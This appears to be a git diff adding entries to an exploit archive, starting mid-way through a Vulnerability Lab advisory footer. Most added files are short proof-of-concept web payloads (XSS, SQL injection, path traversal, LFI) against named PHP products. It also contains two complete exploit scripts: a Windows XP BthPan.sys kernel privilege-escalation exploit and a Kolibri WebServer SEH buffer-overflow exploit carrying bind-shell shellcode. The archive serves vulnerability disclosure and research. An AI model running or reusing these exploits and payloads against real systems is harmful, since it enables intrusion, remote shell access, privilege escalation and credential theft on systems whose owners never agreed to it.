+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/34038.txt b/platforms/php/webapps/34038.txt
new file mode 100755
index 000000000..42589ea57
--- /dev/null
+++ b/platforms/php/webapps/34038.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
+# Date: 11-07-2014
+# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
+# Vendor Homepage: http://www.aerohive.com/products/overview.html
+# Version: 5.1r5 - 6.1r5 (possibly earlier versions)
+
+Description
+================
+Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further). 
+It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.
+
+Details
+================
+AeroHive  HiveOS Version:  5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
+ 
+ 
+Vulnerability
+================
+An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.
+
+ 
+Proof of concept XSS
+====================
+Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
+echo -en '"><script>alert('XSS');</script>' | base64
+Add the output to the ERROR_INFO variable.
+
+Example:
+http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
+
+Proof of concept LFI
+====================
+Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>
+
+Example:
+http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
+
+
+Fix
+================
+The vulnerabilities were resolved in version 6.1r5.
+ 
+ 
+Disclosure Timeline
+================
+ 
+2014-03-12: Reported to vendor
+2014-03-12: Vendor confirmed, gave tracking-id
+2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
+2014-04-02: Requested status update
+2014-04-02: Vendor indicates they once the new version is released
+2014-07-07: Requested status update
+2014-07-07: Vendor indicated the update was previously published
diff --git a/platforms/php/webapps/34137.txt b/platforms/php/webapps/34137.txt
new file mode 100755
index 000000000..f2b0553be
--- /dev/null
+++ b/platforms/php/webapps/34137.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40828/info
+
+The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/index.php?r=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34138.txt b/platforms/php/webapps/34138.txt
new file mode 100755
index 000000000..989b3c4e9
--- /dev/null
+++ b/platforms/php/webapps/34138.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40832/info
+
+VideoWhisper PHP 2 Way Video Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34139.txt b/platforms/php/webapps/34139.txt
new file mode 100755
index 000000000..f96d18573
--- /dev/null
+++ b/platforms/php/webapps/34139.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40834/info
+
+Yamamah Photo Gallery is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+Yamamah 1.00 is vulnerable; other versions may also be affected.
+
+http://www.example.com/themes/default/download.php?dfownload=../../includes/config.inc.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/34140.txt b/platforms/php/webapps/34140.txt
new file mode 100755
index 000000000..f91fe04df
--- /dev/null
+++ b/platforms/php/webapps/34140.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40838/info
+
+
+AneCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+AneCMS 1.3 is vulnerable; other versions may also be affected. 
+
+hello <script>alert(document.cookie)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34141.txt b/platforms/php/webapps/34141.txt
new file mode 100755
index 000000000..1cc5b5de0
--- /dev/null
+++ b/platforms/php/webapps/34141.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40840/info
+
+AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AneCMS 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63 
\ No newline at end of file
diff --git a/platforms/php/webapps/34142.txt b/platforms/php/webapps/34142.txt
new file mode 100755
index 000000000..4e89d19cd
--- /dev/null
+++ b/platforms/php/webapps/34142.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40841/info
+
+MODx is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MODx 1.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/manager/index.php?id=4%27+ANY_SQL&a=16
+http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE 
\ No newline at end of file
diff --git a/platforms/php/webapps/34144.txt b/platforms/php/webapps/34144.txt
new file mode 100755
index 000000000..5b8d7b5ea
--- /dev/null
+++ b/platforms/php/webapps/34144.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40860/info
+
+The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example URI is available:
+
+http://www.example.com/index.php?option=com_easygb&Itemid=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34146.txt b/platforms/php/webapps/34146.txt
new file mode 100755
index 000000000..cb21c66b1
--- /dev/null
+++ b/platforms/php/webapps/34146.txt
@@ -0,0 +1,11 @@
+source:  http://www.securityfocus.com/bid/40869/info
+
+Sell@Site PHP Online Jobs is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+
+The following example data are available:
+
+Username: a' or '1'='1
+Password: a' or '1'='1 
\ No newline at end of file
diff --git a/platforms/php/webapps/34147.txt b/platforms/php/webapps/34147.txt
new file mode 100755
index 000000000..872d7d936
--- /dev/null
+++ b/platforms/php/webapps/34147.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40880/info
+
+JForum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+JForum 2.1.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=�?�><script src=�?�http://example.org/test.js�?�></script><div 
\ No newline at end of file
diff --git a/platforms/unix/dos/34145.txt b/platforms/unix/dos/34145.txt
new file mode 100755
index 000000000..3d4c8727c
--- /dev/null
+++ b/platforms/unix/dos/34145.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40863/info
+
+The 'audioop' module for Python is prone to a memory-corruption vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+ $ python -c "import audioop; audioop.reverse('X', 2)" 
\ No newline at end of file
diff --git a/platforms/windows/local/34131.py b/platforms/windows/local/34131.py
new file mode 100755
index 000000000..3ff67f3ad
--- /dev/null
+++ b/platforms/windows/local/34131.py
@@ -0,0 +1,226 @@
+"""
+Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
+Advisory ID: KL-001-2014-002
+Publication Date: 2014-07-18
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt
+
+
+1. Vulnerability Details
+
+     Affected Vendor: Microsoft
+     Affected Product: Bluetooth Personal Area Networking
+     Affected Versions: 5.1.2600.5512
+     Platform: Microsoft Windows XP SP3
+     CWE Classification: CWE-123: Write-what-where Condition
+     Impact: Privilege Escalation
+     Attack vector: IOCTL
+     CVE ID: CVE-2014-4971
+
+2. Vulnerability Description
+
+     A vulnerability within the BthPan module allows an attacker to
+     inject memory they control into an arbitrary location they
+     define. This can be used by an attacker to overwrite
+     HalDispatchTable+0x4 and execute arbitrary code by subsequently
+     calling NtQueryIntervalProfile.
+
+3. Technical Description
+
+     A userland process can create a handle into the BthPan device
+     and subsequently make DeviceIoControlFile() calls into that
+     device. During the IRP handler routine for 0x0012b814 the user
+     provided OutputBuffer address is not validated. This allows an
+     attacker to specify an arbitrary address and write
+     (or overwrite) the memory residing at the specified address.
+     This is classicaly known as a write-what-where vulnerability and
+     has well known exploitation methods associated with it.
+
+     A stack trace from our fuzzing can be seen below. In our fuzzing
+     testcase, the specified OutputBuffer in the DeviceIoControlFile()
+     call is 0xffff0000.
+
+STACK_TEXT:
+b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
+b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
+b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
+b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
+b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
+b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
+b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
+b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
+b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
+b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
+b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
+b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
+b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
+b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
+b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
+b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
+b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
+b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
+WARNING: Stack unwind information not available. Following frames may be wrong.
+
+     Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
+     command shows the fault originating in the bthpan driver.
+
+FOLLOWUP_IP:
+bthpan!BthpanReqAdd+16b
+b272b5a1 ebc2            jmp     bthpan!BthpanReqAdd+0x12f (b272b565)
+
+     Reviewing the TRAP_FRAME at the time of crash we can see
+     IopCompleteRequest() copying data from InputBuffer into the
+     OutputBuffer. InputBuffer is another parameter provided to the
+     DeviceIoControlFile() function and is therefore controllable by
+     the attacker. The edi register contains the invalid address
+     provided during the fuzz testcase.
+
+TRAP_FRAME:  b1e06630 -- (.trap 0xffffffffb1e06630)
+ErrCode = 00000002
+eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
+eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0         nv up ei pl nz na po cy
+cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010203
+nt!IopCompleteRequest+0x92:
+804f3b76 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+
+     A write-what-where vulnerability can be leveraged to obtain
+     escalated privileges. To do so, an attacker will need to
+     allocate memory in userland that is populated with shellcode
+     designed to find the Token for PID 4 (System) and then overwrite
+     the token for its own process. By leveraging the vulnerability
+     in BthPan it is then possible to overwrite the pointer at
+     HalDispatchTable+0x4 with a pointer to our shellcode. Calling
+     NtQueryIntervalProfile() will subsequently call
+     HalDispatchTable+0x4, execute our shellcode, and elevate the
+     privilege of the exploit process.
+
+4. Mitigation and Remediation Recommendation
+
+     None. A patch is not likely to be forthcoming from the vendor.
+
+5. Credit
+
+     This vulnerability was discovered by Matt Bergin of KoreLogic
+     Security, Inc.
+
+6. Disclosure Timeline
+
+   2014.04.28 - Initial contact; sent Microsoft report and PoC.
+   2014.04.28 - Microsoft acknowledges receipt of vulnerability
+                report; states XP is no longer supported and asks if
+                the vulnerability affects other versions of Windows.
+   2014.04.29 - KoreLogic asks Microsoft for clarification of their
+                support policy for XP.
+   2014.04.29 - Microsoft says XP-only vulnerabilities will not be
+                addressed with patches.
+   2014.04.29 - KoreLogic asks if Microsoft intends to address the
+                vulnerability report.
+   2014.04.29 - Microsoft opens case to investigate the impact of the
+                vulnerability on non-XP systems.
+   2014.05.06 - Microsoft asks again if this vulnerability affects
+                non-XP systems.
+   2014.05.14 - KoreLogic informs Microsoft that the vulnerability
+                report is for XP and other Windows versions have not
+                been examined.
+   2014.06.11 - KoreLogic informs Microsoft that 30 business days have
+                passed since vendor acknowledgement of the initial
+                report.  KoreLogic requests CVE number for the
+                vulnerability, if there is one. KoreLogic also
+                requests vendor's public identifier for the
+                vulnerability along with the expected disclosure date.
+   2014.06.11 - Microsoft informs KoreLogic that the vulnerability
+                does not impact any "up-platform" products. Says they
+                are investigating embedded platforms. Does not provide
+                CVE number.
+   2014.06.24 - Microsoft contacts KoreLogic to say that they confused
+                the report of this vulnerability with another and that
+                they cannot reproduce the described behavior.
+                Microsoft asks for an updated Proof-of-Concept, crash
+                dumps or any further analysis of the vulnerability
+                that KoreLogic can provide.
+   2014.06.25 - KoreLogic provides Microsoft with an updated
+                Proof-of-Concept which demonstrates using the
+                vulnerability to spawn a system shell.
+   2014.06.30 - KoreLogic asks Microsoft for confirmation of their
+                receipt of the updated PoC. Also requests that a CVE
+                ID be issued for this vulnerability.
+   2014.07.02 - 45 business days have elapsed since Microsoft
+                acknowledged receipt of the vulnerability report and
+                PoC.
+   2014.07.07 - KoreLogic requests CVE from MITRE.
+   2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be
+                identical to KL-001-2014-003 and issues CVE-2014-4971
+                for both vulnerabilities.
+   2014.07.18 - Public disclosure.
+
+7. Proof of Concept
+"""
+
+#!/usr/bin/python2
+#
+# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
+# Matt Bergin (KoreLogic / Smash the Stack) 
+# CVE-2014-4971
+#
+from ctypes import *
+from struct import pack
+from os import getpid,system
+from sys import exit
+     EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
+     GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
+     INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
+     
+     # thanks to offsec for the concept
+     # I re-wrote the code as to not fully insult them 
+     def getBase(name=None):
+     	retArray = c_ulong*1024
+     	ImageBase = retArray()
+     	callback = c_int(1024)
+     	cbNeeded = c_long()
+     	EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
+     	for base in ImageBase:
+     		driverName = c_char_p("\x00"*1024)
+     		GetDeviceDriverBaseNameA(base,driverName,48)
+     		if (name):
+     			if (driverName.value.lower() == name):
+     				return base
+     		else:
+     			return (base,driverName.value)
+     	return None
+     
+     handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
+     if (handle == INVALID_HANDLE_VALUE):
+	print "[!] Could not open handle to BthPan"
+	exit(1)
+     NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
+     buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
+     WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
+     WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
+     kBase,kVer = getBase()
+     hKernel = LoadLibraryExA(kVer,0,1)
+     HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
+     HalDispatchTable -= hKernel
+     HalDispatchTable += kBase
+     HalDispatchTable += 0x4
+     DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
+     CloseHandle(handle)
+     NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
+     exit(0)
+
+"""
+The contents of this advisory are copyright(c) 2014 KoreLogic, Inc.
+and are licensed under a Creative Commons Attribution Share-Alike 4.0
+(United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a proven
+track record of providing security services to entities ranging from
+Fortune 500 to small and mid-sized companies. We are a highly skilled
+team of senior security consultants doing by-hand security assessments
+for the most important networks in the U.S. and around the world. We
+are also developers of various tools and resources aimed at helping
+the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
+"""
\ No newline at end of file
diff --git a/platforms/windows/remote/34059.py b/platforms/windows/remote/34059.py
new file mode 100755
index 000000000..e8370cb02
--- /dev/null
+++ b/platforms/windows/remote/34059.py
@@ -0,0 +1,118 @@
+#!/usr/bin/python
+# Exploit Title		: Kolibri WebServer 2.0 Get Request SEH Exploit
+# Exploit Author	: Revin Hadi S
+# Date			: 14/07/2014
+# Vendor		: http://www.senkas.com
+# Version		: 2.0
+# Tested on 		: Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
+import socket, sys
+
+help = """Kolibri WebServer 2.0 Get Request SEH Exploit
+
+Target
+[1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
+[2]Windows 7 SP1 Eng
+
+Usage : %s [rhost] [port] [target]""" %sys.argv[0]
+
+try:
+	script, rhost, port, target = sys.argv
+except ValueError:
+	print help
+	exit()
+
+try:
+	port = int(port)
+	target = int(target)
+except ValueError:
+	print "Port & Target should number !"
+	exit() 
+
+#msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
+shellcode = ("\x89\xe2\xd9\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x39\x6c\x79\x78\x6f\x79\x75\x50\x57\x70\x53\x30\x65\x30\x6f"
+"\x79\x68\x65\x50\x31\x69\x42\x71\x74\x6c\x4b\x43\x62\x46\x50"
+"\x6e\x6b\x61\x42\x74\x4c\x6c\x4b\x66\x32\x35\x44\x4e\x6b\x33"
+"\x42\x64\x68\x66\x6f\x6c\x77\x51\x5a\x37\x56\x75\x61\x79\x6f"
+"\x30\x31\x49\x50\x6e\x4c\x65\x6c\x73\x51\x53\x4c\x45\x52\x46"
+"\x4c\x67\x50\x49\x51\x48\x4f\x56\x6d\x53\x31\x38\x47\x39\x72"
+"\x4a\x50\x72\x72\x36\x37\x4e\x6b\x62\x72\x54\x50\x6c\x4b\x43"
+"\x72\x55\x6c\x36\x61\x6e\x30\x6e\x6b\x33\x70\x72\x58\x6e\x65"
+"\x39\x50\x52\x54\x50\x4a\x47\x71\x6e\x30\x32\x70\x4c\x4b\x72"
+"\x68\x35\x48\x4e\x6b\x50\x58\x45\x70\x45\x51\x4e\x33\x6d\x33"
+"\x35\x6c\x43\x79\x4c\x4b\x64\x74\x4c\x4b\x57\x71\x49\x46\x55"
+"\x61\x79\x6f\x50\x31\x6f\x30\x4e\x4c\x39\x51\x48\x4f\x44\x4d"
+"\x37\x71\x59\x57\x64\x78\x79\x70\x53\x45\x69\x64\x76\x63\x33"
+"\x4d\x79\x68\x37\x4b\x53\x4d\x45\x74\x30\x75\x58\x62\x30\x58"
+"\x4c\x4b\x31\x48\x67\x54\x36\x61\x78\x53\x53\x56\x6c\x4b\x74"
+"\x4c\x50\x4b\x4c\x4b\x53\x68\x47\x6c\x36\x61\x48\x53\x6c\x4b"
+"\x76\x64\x4c\x4b\x73\x31\x4a\x70\x4b\x39\x33\x74\x61\x34\x47"
+"\x54\x33\x6b\x71\x4b\x70\x61\x50\x59\x52\x7a\x50\x51\x4b\x4f"
+"\x6d\x30\x31\x48\x43\x6f\x53\x6a\x6c\x4b\x66\x72\x38\x6b\x6c"
+"\x46\x53\x6d\x70\x68\x34\x73\x36\x52\x33\x30\x53\x30\x52\x48"
+"\x72\x57\x50\x73\x45\x62\x53\x6f\x76\x34\x51\x78\x72\x6c\x62"
+"\x57\x46\x46\x47\x77\x79\x6f\x78\x55\x78\x38\x4e\x70\x35\x51"
+"\x45\x50\x53\x30\x35\x79\x6a\x64\x31\x44\x76\x30\x71\x78\x61"
+"\x39\x6d\x50\x50\x6b\x35\x50\x49\x6f\x6a\x75\x32\x70\x30\x50"
+"\x72\x70\x66\x30\x61\x50\x36\x30\x31\x50\x50\x50\x51\x78\x68"
+"\x6a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x38\x55\x4b\x39\x38\x47"
+"\x44\x71\x79\x4b\x43\x63\x31\x78\x37\x72\x67\x70\x52\x36\x47"
+"\x32\x6f\x79\x4a\x46\x72\x4a\x72\x30\x46\x36\x50\x57\x52\x48"
+"\x79\x52\x79\x4b\x74\x77\x30\x67\x59\x6f\x58\x55\x46\x33\x61"
+"\x47\x53\x58\x6e\x57\x69\x79\x65\x68\x59\x6f\x59\x6f\x69\x45"
+"\x46\x33\x30\x53\x76\x37\x50\x68\x74\x34\x78\x6c\x47\x4b\x48"
+"\x61\x6b\x4f\x4a\x75\x43\x67\x4d\x59\x38\x47\x65\x38\x61\x65"
+"\x70\x6e\x70\x4d\x61\x71\x79\x6f\x39\x45\x70\x68\x31\x73\x50"
+"\x6d\x31\x74\x67\x70\x6f\x79\x39\x73\x32\x77\x52\x77\x70\x57"
+"\x66\x51\x68\x76\x73\x5a\x54\x52\x46\x39\x63\x66\x69\x72\x69"
+"\x6d\x61\x76\x4a\x67\x33\x74\x76\x44\x65\x6c\x55\x51\x73\x31"
+"\x6c\x4d\x43\x74\x31\x34\x32\x30\x4a\x66\x67\x70\x57\x34\x56"
+"\x34\x36\x30\x30\x56\x56\x36\x30\x56\x43\x76\x42\x76\x32\x6e"
+"\x71\x46\x36\x36\x70\x53\x46\x36\x55\x38\x33\x49\x78\x4c\x37"
+"\x4f\x6b\x36\x49\x6f\x49\x45\x4b\x39\x59\x70\x50\x4e\x31\x46"
+"\x50\x46\x49\x6f\x50\x30\x42\x48\x36\x68\x4e\x67\x35\x4d\x73"
+"\x50\x6b\x4f\x59\x45\x6f\x4b\x4c\x30\x48\x35\x4f\x52\x33\x66"
+"\x63\x58\x6d\x76\x5a\x35\x6f\x4d\x6f\x6d\x69\x6f\x58\x55\x77"
+"\x4c\x63\x36\x33\x4c\x56\x6a\x6b\x30\x69\x6b\x4d\x30\x53\x45"
+"\x45\x55\x4f\x4b\x70\x47\x52\x33\x44\x32\x52\x4f\x51\x7a\x63"
+"\x30\x66\x33\x6b\x4f\x78\x55\x41\x41")
+
+#egghunter's tag : doge
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+if target == 1:
+	buff = 792
+elif target == 2:
+	buff = 794
+else:
+	print "Input Target option's number !"
+	exit()
+
+buffer = "\x90"*(buff-20-32-4)
+buffer += egghunter
+buffer += "\x90"*20
+buffer += "\xEB\xBA\x90\x90"
+buffer += "\xC2\x15\x40"		#/p/p/r kolibri.exe
+
+eggshell = "dogedoge"+shellcode
+
+evil = (
+"GET /"+buffer+" HTTP/1.1\r\n"
+"Host: "+eggshell+"\r\n"
+"User-Agent: kepo\r\n"
+"Connection: close\r\n\r\n")
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+	s.connect((rhost, port))
+except socket.error:
+	print "[!]Host down or unreachable !"
+	exit()
+s.send(evil)
+s.close()
+
+print "Exploit sended ! Wait a minute the egghunter may take a while to find the tag..."
diff --git a/platforms/windows/remote/34143.txt b/platforms/windows/remote/34143.txt
new file mode 100755
index 000000000..cffbff5fe
--- /dev/null
+++ b/platforms/windows/remote/34143.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40852/info
+
+XnView is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+Versions prior to XnView 1.97.5 are vulnerable. 
+
+http://www.exploit-db.com/sploits/34143.rar
\ No newline at end of file